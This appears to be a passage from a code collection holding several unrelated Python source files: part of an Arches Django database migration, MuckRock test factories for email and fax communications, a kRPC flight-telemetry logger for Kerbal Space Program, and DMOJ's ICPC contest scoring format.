IF trim(p_label) is not null and p_label<>'' then
INSERT INTO values (valueid, conceptid, valuetype, value, languageid)
VALUES (v_valueid, v_conceptid, 'prefLabel', trim(initcap(p_label)), v_languageid);
END IF;
IF trim(p_note) is not null and p_note <> '' then
INSERT INTO values (valueid, conceptid, valuetype, value, languageid)
VALUES (v_valueid, v_conceptid, 'scopeNote', p_note, v_languageid);
END IF;
return v_conceptid;
""",
returntype="uuid",
),
migrations.CreateModel(
name="GraphModel",
fields=[
("graphid", models.UUIDField(default=uuid.uuid1, serialize=False, primary_key=True)),
("name", models.TextField(null=True, blank=True)),
("description", models.TextField(null=True, blank=True)),
("deploymentfile", models.TextField(null=True, blank=True)),
("author", models.TextField(null=True, blank=True)),
("deploymentdate", models.DateTimeField(null=True, blank=True)),
("version", models.TextField(null=True, blank=True)),
("isresource", models.BooleanField()),
("isactive", models.BooleanField()),
("iconclass", models.TextField(null=True, blank=True)),
("mapfeaturecolor", models.TextField(blank=True, null=True)),
("maplinewidth", models.IntegerField(blank=True, null=True)),
("mappointsize", models.IntegerField(blank=True, null=True)),
("subtitle", models.TextField(null=True, blank=True)),
],
options={"db_table": "graphs", "managed": True,},
),
migrations.CreateModel(name="Graph", fields=[], options={"proxy": True,}, bases=("models.GraphModel",),),
migrations.CreateModel(
name="CardModel",
fields=[
("cardid", models.UUIDField(default=uuid.uuid1, serialize=False, primary_key=True)),
("name", models.TextField(null=True, blank=True)),
("description", models.TextField(null=True, blank=True)),
("instructions", models.TextField(null=True, blank=True)),
("helpenabled", models.BooleanField(default=False)),
("helptitle", models.TextField(null=True, blank=True)),
("helptext", models.TextField(null=True, blank=True)),
("active", models.BooleanField(default=True)),
("visible", models.BooleanField(default=True)),
("sortorder", models.IntegerField(blank=True, null=True, default=None)),
],
options={"db_table": "cards", "managed": True,},
),
migrations.CreateModel(name="Card", fields=[], options={"proxy": True,}, bases=("models.CardModel",),),
migrations.CreateModel(
name="CardXNodeXWidget",
fields=[
("card", models.ForeignKey(to="models.CardModel", db_column="cardid", on_delete=models.CASCADE)),
("id", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("config", JSONField(blank=True, db_column="config", null=True)),
("label", models.TextField(blank=True, null=True)),
("sortorder", models.IntegerField(blank=True, null=True, default=None)),
],
options={"db_table": "cards_x_nodes_x_widgets", "managed": True,},
),
migrations.CreateModel(
name="Concept",
fields=[
("conceptid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("legacyoid", models.TextField(unique=True)),
],
options={"db_table": "concepts", "managed": True,},
),
migrations.CreateModel(
name="DDataType",
fields=[
("datatype", models.TextField(primary_key=True, serialize=False)),
("iconclass", models.TextField()),
("modulename", models.TextField(blank=True, null=True)),
("classname", models.TextField(blank=True, null=True)),
("configcomponent", models.TextField(blank=True, null=True)),
("defaultconfig", JSONField(blank=True, db_column="defaultconfig", null=True)),
("configname", models.TextField(blank=True, null=True)),
("isgeometric", models.BooleanField(default=False)),
],
options={"db_table": "d_data_types", "managed": True,},
),
migrations.CreateModel(
name="DLanguage",
fields=[
("languageid", models.TextField(primary_key=True, serialize=False)),
("languagename", models.TextField()),
("isdefault", models.BooleanField()),
],
options={"db_table": "d_languages", "managed": True,},
),
migrations.CreateModel(
name="DNodeType",
fields=[("nodetype", models.TextField(primary_key=True, serialize=False)), ("namespace", models.TextField()),],
options={"db_table": "d_node_types", "managed": True,},
),
migrations.CreateModel(
name="DRelationType",
fields=[
("relationtype", models.TextField(primary_key=True, serialize=False)),
("category", models.TextField()),
("namespace", models.TextField()),
],
options={"db_table": "d_relation_types", "managed": True,},
),
migrations.CreateModel(
name="DValueType",
fields=[
("valuetype", models.TextField(primary_key=True, serialize=False)),
("category", models.TextField(blank=True, null=True)),
("description", models.TextField(blank=True, null=True)),
("namespace", models.TextField()),
("datatype", models.TextField(blank=True, null=True)),
],
options={"db_table": "d_value_types", "managed": True,},
),
migrations.CreateModel(
name="Edge",
fields=[
("edgeid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField(blank=True, null=True)),
("description", models.TextField(blank=True, null=True)),
("ontologyproperty", models.TextField(blank=True, null=True)),
(
"graph",
models.ForeignKey(blank=False, db_column="graphid", null=False, to="models.GraphModel", on_delete=models.CASCADE),
),
],
options={"db_table": "edges", "managed": True,},
),
migrations.CreateModel(
name="EditLog",
fields=[
("editlogid", models.UUIDField(default=uuid.uuid1, serialize=False, primary_key=True)),
("resourceclassid", models.TextField(null=True, blank=True)),
("resourceinstanceid", models.TextField(null=True, blank=True)),
("attributenodeid", models.TextField(null=True, blank=True)),
("tileinstanceid", models.TextField(null=True, blank=True)),
("edittype", models.TextField(null=True, blank=True)),
("newvalue", models.TextField(null=True, blank=True)),
("oldvalue", models.TextField(null=True, blank=True)),
("timestamp", models.DateTimeField(null=True, blank=True)),
("userid", models.TextField(null=True, blank=True)),
("user_firstname", models.TextField(null=True, blank=True)),
("user_lastname", models.TextField(null=True, blank=True)),
("user_email", models.TextField(null=True, blank=True)),
("note", models.TextField(null=True, blank=True)),
],
options={"db_table": "edit_log", "managed": True,},
),
migrations.CreateModel(
name="File",
fields=[
("fileid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("path", models.FileField(upload_to="uploadedfiles")),
],
options={"db_table": "files", "managed": True,},
),
migrations.CreateModel(
name="Form",
fields=[
("formid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("title", models.TextField(blank=True, null=True)),
("subtitle", models.TextField(blank=True, null=True)),
("iconclass", models.TextField(blank=True, null=True)),
("visible", models.BooleanField(default=True)),
("sortorder", models.IntegerField(blank=True, null=True, default=None)),
],
options={"db_table": "forms", "managed": True,},
),
migrations.CreateModel(
name="FormXCard",
fields=[
("id", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("card", models.ForeignKey(to="models.CardModel", db_column="cardid", on_delete=models.CASCADE)),
("form", models.ForeignKey(to="models.Form", db_column="formid", on_delete=models.CASCADE)),
("sortorder", models.IntegerField(blank=True, null=True, default=None)),
],
options={"db_table": "forms_x_cards", "managed": True,},
),
migrations.CreateModel(
name="Function",
fields=[
("functionid", models.UUIDField(primary_key=True, default=uuid.uuid1, serialize=False)),
("functiontype", models.TextField(blank=True, null=True)),
("name", models.TextField(blank=True, null=True)),
("description", models.TextField(blank=True, null=True)),
("defaultconfig", JSONField(blank=True, null=True, db_column="defaultconfig")),
("modulename", models.TextField(blank=True, null=True)),
("classname", models.TextField(blank=True, null=True)),
("component", models.TextField(blank=True, null=True)),
],
options={"db_table": "functions", "managed": True,},
),
migrations.CreateModel(
name="FunctionXGraph",
fields=[
("id", models.UUIDField(primary_key=True, default=uuid.uuid1, serialize=False)),
("function", models.ForeignKey(to="models.Function", db_column="functionid", on_delete=models.CASCADE)),
("graph", models.ForeignKey(to="models.GraphModel", db_column="graphid", on_delete=models.CASCADE)),
("config", JSONField(blank=True, null=True, db_column="config")),
],
options={"db_table": "functions_x_graphs", "managed": True,},
),
migrations.CreateModel(
name="Icon",
fields=[
("id", models.AutoField(primary_key=True, serialize=True)),
("name", models.TextField(blank=True, null=True)),
("cssclass", models.TextField(blank=True, null=True)),
],
options={"db_table": "icons", "managed": True,},
),
migrations.CreateModel(
name="Node",
fields=[
("nodeid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField()),
("description", models.TextField(blank=True, null=True)),
("istopnode", models.BooleanField()),
("ontologyclass", models.TextField(blank=True, null=True)),
("datatype", models.TextField()),
(
"graph",
models.ForeignKey(blank=False, db_column="graphid", null=False, to="models.GraphModel", on_delete=models.CASCADE),
),
("config", JSONField(blank=True, db_column="config", null=True)),
],
options={"db_table": "nodes", "managed": True,},
),
migrations.CreateModel(
name="NodeGroup",
fields=[
("nodegroupid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("legacygroupid", models.TextField(blank=True, null=True)),
("cardinality", models.TextField(blank=True, default="1")),
(
"parentnodegroup",
models.ForeignKey(
blank=True, db_column="parentnodegroupid", null=True, to="models.NodeGroup", on_delete=models.CASCADE
),
),
],
options={
"db_table": "node_groups",
"managed": True,
"default_permissions": (),
"permissions": (
("read_nodegroup", "Read"),
("write_nodegroup", "Create/Update"),
("delete_nodegroup", "Delete"),
("no_access_to_nodegroup", "No Access"),
),
},
),
migrations.CreateModel(
name="Ontology",
fields=[
("ontologyid", models.UUIDField(default=uuid.uuid1, primary_key=True)),
("name", models.TextField()),
("version", models.TextField()),
("path", models.TextField()),
(
"parentontology",
models.ForeignKey(
to="models.Ontology",
db_column="parentontologyid",
related_name="extensions",
null=True,
blank=True,
on_delete=models.CASCADE,
),
),
],
options={"db_table": "ontologies", "managed": True,},
),
migrations.CreateModel(
name="OntologyClass",
fields=[
("ontologyclassid", models.UUIDField(default=uuid.uuid1, primary_key=True)),
("source", models.TextField()),
("target", JSONField(null=True)),
(
"ontology",
models.ForeignKey(
to="models.Ontology", db_column="ontologyid", related_name="ontologyclasses", on_delete=models.CASCADE
),
),
],
options={"db_table": "ontologyclasses", "managed": True,},
),
migrations.CreateModel(
name="Relation",
fields=[
("relationid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
(
"conceptfrom",
models.ForeignKey(
db_column="conceptidfrom", related_name="relation_concepts_from", to="models.Concept", on_delete=models.CASCADE
),
),
(
"conceptto",
models.ForeignKey(
db_column="conceptidto", related_name="relation_concepts_to", to="models.Concept", on_delete=models.CASCADE
),
),
("relationtype", models.ForeignKey(db_column="relationtype", to="models.DRelationType", on_delete=models.CASCADE)),
],
options={"db_table": "relations", "managed": True,},
),
migrations.CreateModel(
name="ReportTemplate",
fields=[
("templateid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField(null=True, blank=True)),
("description", models.TextField(null=True, blank=True)),
("component", models.TextField()),
("componentname", models.TextField()),
("defaultconfig", JSONField(blank=True, db_column="defaultconfig", null=True)),
],
options={"db_table": "report_templates", "managed": True,},
),
migrations.CreateModel(
name="Report",
fields=[
("reportid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField(null=True, blank=True)),
("template", models.ForeignKey(db_column="templateid", to="models.ReportTemplate", on_delete=models.CASCADE)),
("graph", models.ForeignKey(db_column="graphid", to="models.GraphModel", on_delete=models.CASCADE)),
("config", JSONField(blank=True, db_column="config", null=True)),
("formsconfig", JSONField(blank=True, db_column="formsconfig", null=True)),
("active", models.BooleanField(default=False)),
],
options={"db_table": "reports", "managed": True,},
),
migrations.CreateModel(
name="Resource2ResourceConstraint",
fields=[
("resource2resourceid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
(
"resourceclassfrom",
models.ForeignKey(
blank=True,
db_column="resourceclassfrom",
null=True,
related_name="resxres_contstraint_classes_from",
to="models.Node",
on_delete=models.SET_NULL,
),
),
(
"resourceclassto",
models.ForeignKey(
blank=True,
db_column="resourceclassto",
null=True,
related_name="resxres_contstraint_classes_to",
to="models.Node",
on_delete=models.SET_NULL,
),
),
],
options={"db_table": "resource_2_resource_constraints", "managed": True,},
),
migrations.CreateModel(
name="ResourceInstance",
fields=[
("resourceinstanceid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("legacyid", models.TextField(blank=True, unique=True, null=True)),
("graph", models.ForeignKey(db_column="graphid", to="models.GraphModel", on_delete=models.CASCADE)),
("createdtime", models.DateTimeField(auto_now_add=True)),
],
options={"db_table": "resource_instances", "managed": True,},
),
migrations.CreateModel(
name="ResourceXResource",
fields=[
("resourcexid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("notes", models.TextField(blank=True, null=True)),
("datestarted", models.DateField(blank=True, null=True)),
("dateended", models.DateField(blank=True, null=True)),
],
options={"db_table": "resource_x_resource", "managed": True,},
),
migrations.CreateModel(
name="TileModel",
fields=[
("tileid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("data", JSONField(blank=True, db_column="tiledata", null=True)),
("nodegroup", models.ForeignKey(db_column="nodegroupid", to="models.NodeGroup", on_delete=models.CASCADE)),
(
"parenttile",
models.ForeignKey(blank=True, db_column="parenttileid", null=True, to="models.TileModel", on_delete=models.CASCADE),
),
(
"resourceinstance",
models.ForeignKey(db_column="resourceinstanceid", to="models.ResourceInstance", on_delete=models.CASCADE),
),
("sortorder", models.IntegerField(blank=True, null=True, default=0)),
],
options={"db_table": "tiles", "managed": True,},
),
migrations.CreateModel(
name="Value",
fields=[
("valueid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("value", models.TextField()),
("concept", models.ForeignKey(db_column="conceptid", to="models.Concept", on_delete=models.CASCADE)),
(
"language",
models.ForeignKey(blank=True, db_column="languageid", null=True, to="models.DLanguage", on_delete=models.CASCADE),
),
("valuetype", models.ForeignKey(db_column="valuetype", to="models.DValueType", on_delete=models.CASCADE)),
],
options={"db_table": "values", "managed": True,},
),
migrations.CreateModel(
name="Widget",
fields=[
("widgetid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField()),
("component", models.TextField()),
("defaultconfig", JSONField(blank=True, db_column="defaultconfig", null=True)),
("helptext", models.TextField(blank=True, null=True)),
("datatype", models.TextField()),
],
options={"db_table": "widgets", "managed": True,},
),
migrations.CreateModel(
name="MapLayer",
fields=[
("maplayerid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField(unique=True)),
("layerdefinitions", JSONField(blank=True, db_column="layerdefinitions", null=True)),
("isoverlay", models.BooleanField(default=False)),
("icon", models.TextField(default=None)),
("activated", models.BooleanField(default=True)),
("addtomap", models.BooleanField(default=False)),
],
options={"db_table": "map_layers", "managed": True,},
),
migrations.CreateModel(
name="MapSource",
fields=[
("id", models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
("name", models.TextField(unique=True)),
("source", JSONField(blank=True, db_column="source", null=True)),
],
options={"db_table": "map_sources", "managed": True,},
),
migrations.CreateModel(
name="TileserverLayer",
fields=[
("name", models.TextField(unique=True)),
("path", models.TextField()),
("config", JSONField(db_column="config")),
("map_layer", models.ForeignKey(db_column="map_layerid", to="models.MapLayer", on_delete=models.CASCADE)),
("map_source", models.ForeignKey(db_column="map_sourceid", to="models.MapSource", on_delete=models.CASCADE)),
],
options={"db_table": "tileserver_layers", "managed": True,},
),
migrations.CreateModel(
name="GraphXMapping",
fields=[
("id", models.UUIDField(primary_key=True, default=uuid.uuid1, serialize=False)),
("graph", models.ForeignKey(to="models.GraphModel", db_column="graphid", on_delete=models.CASCADE)),
("mapping", JSONField(blank=True, db_column="mapping")),
],
options={"db_table": "graphs_x_mapping_file", "managed": True,},
),
migrations.AddField(
model_name="ddatatype",
name="defaultwidget",
field=models.ForeignKey(db_column="defaultwidget", to="models.Widget", null=True, on_delete=models.SET_NULL),
),
migrations.AddField(
model_name="resourcexresource",
name="relationshiptype",
field=models.ForeignKey(db_column="relationshiptype", to="models.Value", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="resourcexresource",
name="resourceinstanceidfrom",
field=models.ForeignKey(
blank=True,
db_column="resourceinstanceidfrom",
null=True,
related_name="resxres_resource_instance_ids_from",
to="models.ResourceInstance",
on_delete=models.CASCADE,
),
),
migrations.AddField(
model_name="resourcexresource",
name="resourceinstanceidto",
field=models.ForeignKey(
blank=True,
db_column="resourceinstanceidto",
null=True,
related_name="resxres_resource_instance_ids_to",
to="models.ResourceInstance",
on_delete=models.CASCADE,
),
),
migrations.AddField(
model_name="node",
name="nodegroup",
field=models.ForeignKey(blank=True, db_column="nodegroupid", null=True, to="models.NodeGroup", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="edge",
name="domainnode",
field=models.ForeignKey(db_column="domainnodeid", related_name="edge_domains", to="models.Node", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="edge",
name="rangenode",
field=models.ForeignKey(db_column="rangenodeid", related_name="edge_ranges", to="models.Node", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="concept",
name="nodetype",
field=models.ForeignKey(db_column="nodetype", to="models.DNodeType", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="cardxnodexwidget",
name="node",
field=models.ForeignKey(db_column="nodeid", to="models.Node", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="cardxnodexwidget",
name="widget",
field=models.ForeignKey(db_column="widgetid", to="models.Widget", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="cardmodel",
name="nodegroup",
field=models.ForeignKey(db_column="nodegroupid", to="models.NodeGroup", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="cardmodel",
name="graph",
field=models.ForeignKey(db_column="graphid", to="models.GraphModel", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="form",
name="graph",
field=models.ForeignKey(
to="models.GraphModel", db_column="graphid", related_name="forms", null=False, blank=False, on_delete=models.CASCADE
),
),
migrations.AddField(
model_name="graphmodel", name="functions", field=models.ManyToManyField(to="models.Function", through="FunctionXGraph"),
),
migrations.AddField(
model_name="graphmodel",
name="ontology",
field=models.ForeignKey(
to="models.Ontology", db_column="ontologyid", related_name="graphs", null=True, blank=True, on_delete=models.SET_NULL
),
),
migrations.AlterUniqueTogether(name="edge", unique_together={("rangenode", "domainnode")},),
migrations.AlterUniqueTogether(name="cardxnodexwidget", unique_together={("node", "card", "widget")},),
migrations.AlterUniqueTogether(name="ontologyclass", unique_together={("source", "ontology")},),
migrations.AlterUniqueTogether(name="relation", unique_together={("conceptfrom", "conceptto", "relationtype")},),
migrations.AlterUniqueTogether(name="functionxgraph", unique_together={("function", "graph")},),
CreateAutoPopulateUUIDField("graphs", ["graphid"]),
CreateAutoPopulateUUIDField("cards", ["cardid"]),
CreateAutoPopulateUUIDField("concepts", ["conceptid"]),
CreateAutoPopulateUUIDField("edges", ["edgeid"]),
CreateAutoPopulateUUIDField("edit_log", ["editlogid"]),
CreateAutoPopulateUUIDField("forms", ["formid"]),
CreateAutoPopulateUUIDField("node_groups", ["nodegroupid"]),
CreateAutoPopulateUUIDField("nodes", ["nodeid"]),
CreateAutoPopulateUUIDField("relations", ["relationid"]),
CreateAutoPopulateUUIDField("resource_2_resource_constraints", ["resource2resourceid"]),
CreateAutoPopulateUUIDField("resource_instances", ["resourceinstanceid"]),
CreateAutoPopulateUUIDField("tiles", ["tileid"]),
CreateAutoPopulateUUIDField("values", ["valueid"]),
CreateAutoPopulateUUIDField("widgets", ["widgetid"]),
migrations.RunSQL(
"""
ALTER TABLE nodes ADD CONSTRAINT nodes_ddatatypes_fk FOREIGN KEY (datatype)
REFERENCES public.d_data_types (datatype) MATCH SIMPLE
"""
),
migrations.RunSQL(get_sql_string_from_file(os.path.join(settings.ROOT_DIR, "db", "dml", "db_data.sql")), ""),
migrations.RunPython(forwards_func, reverse_func),
migrations.RunPython(make_permissions, reverse_code=lambda *args, **kwargs: True),
]
|
archesproject/arches
|
arches/app/models/migrations/0001_initial.py
|
Python
|
agpl-3.0
| 36,390
|
"""
Testing factories for the communication app
"""
# Django
from django.utils import timezone
# Standard Library
from datetime import timedelta
# Third Party
import factory
import faker.providers.phone_number.en_US as faker_phone
# MuckRock
from muckrock.communication.models import (
Address,
EmailAddress,
EmailCommunication,
FaxCommunication,
PhoneNumber,
)
# Monkey patch the faker phone number provider to not produce international numbers
faker_phone.Provider.formats = [
f for f in faker_phone.Provider.formats if not f.startswith("+")
]
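# Sanity check (editor's sketch): after the patch above, no remaining format
# template should start with "+", i.e. no international numbers. This assumes
# the en_US provider keeps exposing its templates via the `formats` attribute.
assert all(not f.startswith("+") for f in faker_phone.Provider.formats)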
class EmailAddressFactory(factory.django.DjangoModelFactory):
"""A factory for creating email addresses"""
class Meta:
model = EmailAddress
email = factory.Faker("email")
name = factory.Faker("name")
class PhoneNumberFactory(factory.django.DjangoModelFactory):
"""A factory for creating phone numbers"""
class Meta:
model = PhoneNumber
number = factory.Sequence(lambda n: "617-555-%04d" % n)
class AddressFactory(factory.django.DjangoModelFactory):
"""A factory for creating addresses"""
class Meta:
model = Address
address = factory.Faker("address")
class EmailCommunicationFactory(factory.django.DjangoModelFactory):
"""A factory for creating email communications"""
class Meta:
model = EmailCommunication
communication = factory.SubFactory(
"muckrock.foia.factories.FOIACommunicationFactory"
)
    # LazyFunction evaluates per instance instead of freezing the timestamp at
    # class-definition (import) time.
    sent_datetime = factory.LazyFunction(lambda: timezone.now() - timedelta(3))
from_email = factory.SubFactory(EmailAddressFactory)
raw_email = factory.RelatedFactory(
"muckrock.foia.factories.RawEmailFactory", "email"
)
class FaxCommunicationFactory(factory.django.DjangoModelFactory):
"""A factory for creating fax communications"""
class Meta:
model = FaxCommunication
communication = factory.SubFactory(
"muckrock.foia.factories.FOIACommunicationFactory"
)
    sent_datetime = factory.LazyFunction(lambda: timezone.now() - timedelta(3))
to_number = factory.SubFactory(PhoneNumberFactory)
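# Usage sketch (editor's addition, not part of the original module): inside a
# Django TestCase these factories build the full object graph in one call.
# FOIACommunicationFactory and RawEmailFactory are referenced above and assumed
# to live in muckrock.foia.factories; the attribute access below is illustrative.
#
#     email_comm = EmailCommunicationFactory()
#     assert email_comm.from_email.email                    # generated by Faker
#     fax = FaxCommunicationFactory(to_number__number="617-555-0000")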
|
MuckRock/muckrock
|
muckrock/communication/factories.py
|
Python
|
agpl-3.0
| 2,077
|
import io
import logging
import sys
import time
import traceback
from tkinter import Listbox, LEFT, BOTH, Label, \
StringVar, NW, BooleanVar, DISABLED, NORMAL, X, NE
import krpc
from tkinter.ttk import Checkbutton, Entry  # ttk is a tkinter submodule on Python 3
from krcc_module import KRCCModule
# DECLARE_KRCC_MODULE
def load(root):
return AvionicsLogger(root)
class AvionicsLogger(KRCCModule):
def __init__(self, root):
super().__init__()
self.root = root
self.exception = None
self.list_string = StringVar()
self.listbox = Listbox(root, listvariable=self.list_string,
font='TkFixedFont', width=30)
self.write_cache = ''
self.logfile = None
self.enable_logging = BooleanVar()
self.enable_logging_checkbox = Checkbutton(
root, var=self.enable_logging, text='Enable logging',
command=self.enable_logging_changed)
self.logfile_label = Label(root, text='Logfile name:')
self.logfile_name = StringVar()
self.logfile_name_entry = Entry(root, textvar=self.logfile_name)
self.load()
def write(self, string):
if self.enable_logging.get() and self.logfile is None:
if self.logfile_name.get() == '':
self.logfile_name.set('logs/{}.log'.format(time.time()))
self.logfile = io.open(self.logfile_name.get(), 'a')
self.logfile.write(self.write_cache)
self.write_cache = ''
self.logfile.write(string)
def cache(self, string):
self.write_cache += string
def enable_logging_changed(self):
if not self.enable_logging.get():
self.logfile_name_entry.configure(state=NORMAL)
if self.logfile is not None:
self.logfile.close()
self.logfile = None
self.logfile_name.set('')
else:
self.logfile_name_entry.configure(state=DISABLED)
def establish_connection_and_run(self):
error = None
dots = 0
connection = None
while not self.terminate:
try:
if connection is None:
connection = krpc.connect(name=self.name)
self.run_with_connection(connection)
error = None
dots = 0
except Exception as e:
if error != e.args[0]:
error = e.args[0]
print('\n')
print(traceback.format_exc())
sys.stdout.write('Retrying')
if dots > 80:
dots = 0
sys.stdout.write('\n')
sys.stdout.write('.')
dots += 1
sys.stdout.flush()
time.sleep(1)
if connection is not None:
connection.close()
def run_with_connection(self, connection):
logging.debug('KRPC connection established')
vessel = connection.space_center.active_vessel
ref = vessel.orbit.body.reference_frame
flight = connection.add_stream(vessel.flight, ref)
floats = [
'mean_altitude',
'atmosphere_density',
'ballistic_coefficient',
'drag_coefficient',
]
vectors = [
'velocity',
]
colon_pos_float = max([len(v) for v in floats])
colon_pos_vec = max([len(v) + 3 for v in vectors])
self.listbox.configure(width=max(colon_pos_float, colon_pos_vec) + 11)
# Write the log file header.
self.cache('time\t' + '\t'.join(floats) + '\t')
s = '{}\t' + '\t'.join('{{}}[{}]'.format(x) for x in [0, 1, 2])
self.cache('\t'.join(s.format(*(v for _ in [0, 1, 2, 3])) for v in vectors))
self.cache('\n')
log_sample_interval = 0.01
next_log_sample = time.time()
while not self.terminate:
values = [time.time()]
strings = []
for name in floats:
                value = getattr(flight(), name)
values.append(value)
padding = colon_pos_float - len(name) + 9
format_string = '{{}}: {{:>{}.3f}}'.format(padding)
strings.append(format_string.format(name, value))
for name in vectors:
                value = getattr(flight(), name)
magnitude = value[0]
padding = colon_pos_float - len(name) + 9
format_string = '{{}}: {{:>{}.3f}}'.format(padding)
strings.append(format_string.format(name, magnitude))
values.append(magnitude)
padding = colon_pos_vec - len(name) + 2
format_string = '{{}}[{{}}]: {{:>{}.3f}}'.format(padding)
for i in [0, 1, 2]:
values.append(value[i])
strings.append(format_string.format(name, i, value[i]))
if self.enable_logging.get() and time.time() > next_log_sample:
self.write('\t'.join(['{}'.format(v) for v in values]) + '\n')
next_log_sample = time.time() + log_sample_interval
self.list_string.set(tuple(strings))
def run(self):
try:
self.establish_connection_and_run()
self.logfile_name_entry.destroy()
self.logfile_label.destroy()
self.enable_logging_checkbox.destroy()
self.listbox.destroy()
except RuntimeError:
# Should only happen when KeyboardInterrupt is thrown in the MainThread.
pass
if self.logfile is not None:
self.logfile.close()
@property
def name(self):
return 'Avionics Logger'
def load(self):
self.listbox.pack(side=LEFT, fill=BOTH)
self.logfile_label.pack(side=LEFT, anchor=NW)
self.logfile_name_entry.pack(side=LEFT, anchor=NE, fill=X, expand=True)
self.enable_logging_checkbox.pack(side=LEFT, anchor=NW)
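# Editor's sketch: the nested format strings in run_with_connection() are easy
# to misread, so this reproduces the TSV header they emit for a small input.
# The __main__ guard keeps it inert when the module is loaded by the KRCC loader.
if __name__ == '__main__':
    demo_floats = ['mean_altitude', 'atmosphere_density']
    demo_vectors = ['velocity']
    demo_s = '{}\t' + '\t'.join('{{}}[{}]'.format(x) for x in [0, 1, 2])
    demo_header = 'time\t' + '\t'.join(demo_floats) + '\t'
    demo_header += '\t'.join(demo_s.format(*(v for _ in range(4))) for v in demo_vectors)
    # -> time  mean_altitude  atmosphere_density  velocity  velocity[0]  velocity[1]  velocity[2]
    print(demo_header)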
|
jsartisohn/krpc_scripts
|
avionics.py
|
Python
|
agpl-3.0
| 5,250
|
from datetime import timedelta
from django.core.exceptions import ValidationError
from django.db import connection
from django.template.defaultfilters import floatformat
from django.urls import reverse
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.translation import gettext_lazy
from judge.contest_format.default import DefaultContestFormat
from judge.contest_format.registry import register_contest_format
from judge.timezone import from_database_time
from judge.utils.timedelta import nice_repr
@register_contest_format('icpc')
class ICPCContestFormat(DefaultContestFormat):
name = gettext_lazy('ICPC')
config_defaults = {'penalty': 20}
config_validators = {'penalty': lambda x: x >= 0}
'''
penalty: Number of penalty minutes each incorrect submission adds. Defaults to 20.
'''
@classmethod
def validate(cls, config):
if config is None:
return
if not isinstance(config, dict):
            raise ValidationError('ICPC-styled contest expects the config to be None or a dict')
for key, value in config.items():
if key not in cls.config_defaults:
raise ValidationError('unknown config key "%s"' % key)
if not isinstance(value, type(cls.config_defaults[key])):
raise ValidationError('invalid type for config key "%s"' % key)
if not cls.config_validators[key](value):
raise ValidationError('invalid value "%s" for config key "%s"' % (value, key))
def __init__(self, contest, config):
self.config = self.config_defaults.copy()
self.config.update(config or {})
self.contest = contest
def update_participation(self, participation):
cumtime = 0
last = 0
penalty = 0
score = 0
format_data = {}
with connection.cursor() as cursor:
cursor.execute('''
SELECT MAX(cs.points) as `points`, (
SELECT MIN(csub.date)
FROM judge_contestsubmission ccs LEFT OUTER JOIN
judge_submission csub ON (csub.id = ccs.submission_id)
WHERE ccs.problem_id = cp.id AND ccs.participation_id = %s AND ccs.points = MAX(cs.points)
) AS `time`, cp.id AS `prob`
FROM judge_contestproblem cp INNER JOIN
judge_contestsubmission cs ON (cs.problem_id = cp.id AND cs.participation_id = %s) LEFT OUTER JOIN
judge_submission sub ON (sub.id = cs.submission_id)
GROUP BY cp.id
''', (participation.id, participation.id))
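            # The query above returns one row per contest problem: the
            # participant's best score on it, the timestamp of the first
            # submission that achieved that score, and the problem id.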
for points, time, prob in cursor.fetchall():
time = from_database_time(time)
dt = (time - participation.start).total_seconds()
# Compute penalty
if self.config['penalty']:
# An IE can have a submission result of `None`
subs = participation.submissions.exclude(submission__result__isnull=True) \
.exclude(submission__result__in=['IE', 'CE']) \
.filter(problem_id=prob)
if points:
prev = subs.filter(submission__date__lte=time).count() - 1
penalty += prev * self.config['penalty'] * 60
else:
# We should always display the penalty, even if the user has a score of 0
prev = subs.count()
else:
prev = 0
if points:
cumtime += dt
last = max(last, dt)
format_data[str(prob)] = {'time': dt, 'points': points, 'penalty': prev}
score += points
participation.cumtime = cumtime + penalty
participation.score = round(score, self.contest.points_precision)
participation.tiebreaker = last # field is sorted from least to greatest
participation.format_data = format_data
participation.save()
def display_user_problem(self, participation, contest_problem):
format_data = (participation.format_data or {}).get(str(contest_problem.id))
if format_data:
penalty = format_html('<small style="color:red"> ({penalty})</small>',
penalty=floatformat(format_data['penalty'])) if format_data['penalty'] else ''
return format_html(
'<td class="{state}"><a href="{url}">{points}{penalty}<div class="solving-time">{time}</div></a></td>',
state=(('pretest-' if self.contest.run_pretests_only and contest_problem.is_pretested else '') +
self.best_solution_state(format_data['points'], contest_problem.points)),
url=reverse('contest_user_submissions',
args=[self.contest.key, participation.user.user.username, contest_problem.problem.code]),
points=floatformat(format_data['points']),
penalty=penalty,
time=nice_repr(timedelta(seconds=format_data['time']), 'noday'),
)
else:
return mark_safe('<td></td>')
def get_label_for_problem(self, index):
index += 1
ret = ''
while index > 0:
ret += chr((index - 1) % 26 + 65)
index = (index - 1) // 26
return ret[::-1]
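# Editor's note: get_label_for_problem() produces bijective base-26
# (spreadsheet-style) labels. A __main__-guarded check of the expected mapping,
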